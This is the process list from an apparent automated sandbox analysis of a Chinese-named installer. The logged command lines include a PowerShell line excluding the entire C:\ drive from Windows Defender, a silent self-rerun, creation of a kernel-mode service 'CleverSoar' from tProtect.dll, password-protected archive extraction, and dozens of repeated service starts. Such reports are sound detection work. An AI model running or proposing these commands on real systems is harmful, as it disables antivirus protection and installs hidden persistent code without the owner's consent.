                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
                                        Imagebase:0x490000
                                        File size:3'366'912 bytes
                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:3
                                        Start time:03:24:09
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                        Imagebase:0x7ff6e3d50000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:03:24:09
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:03:24:10
                                        Start date:23/12/2024
                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
                                        Imagebase:0xde0000
                                        File size:5'707'508 bytes
                                        MD5 hash:8D24FF51C87BC901CB4C88CB885DC15A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low
                                        Has exited:false

                                        Target ID:6
                                        Start time:03:24:11
                                        Start date:23/12/2024
                                        Path:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$203E4,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
                                        Imagebase:0xb30000
                                        File size:3'366'912 bytes
                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:7
                                        Start time:03:24:13
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:03:24:13
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:03:24:13
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:03:24:13
                                        Start date:23/12/2024
                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                        Wow64 process (32bit):true
                                        Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                        Imagebase:0xe90000
                                        File size:831'200 bytes
                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:11
                                        Start time:03:24:13
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:12
                                        Start time:03:24:14
                                        Start date:23/12/2024
                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                        Wow64 process (32bit):true
                                        Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                        Imagebase:0xe90000
                                        File size:831'200 bytes
                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:13
                                        Start time:03:24:14
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:14
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0x7ff717f30000
                                        File size:496'640 bytes
                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:18
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:19
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:20
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:22
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:23
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:24
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:25
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:26
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:27
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:28
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:29
                                        Start time:03:24:15
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:30
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:31
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:32
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:33
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:34
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:35
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:36
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:37
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:38
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:39
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:40
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:41
                                        Start time:03:24:16
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:42
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:43
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:44
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:45
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:46
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:47
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:48
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:49
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:50
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:51
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:52
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:53
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:54
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:55
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:56
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:57
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:58
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:59
                                        Start time:03:24:17
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:60
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff7403e0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:61
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:62
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:63
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff6ecd10000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:64
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff712250000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:65
                                        Start time:03:24:18
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
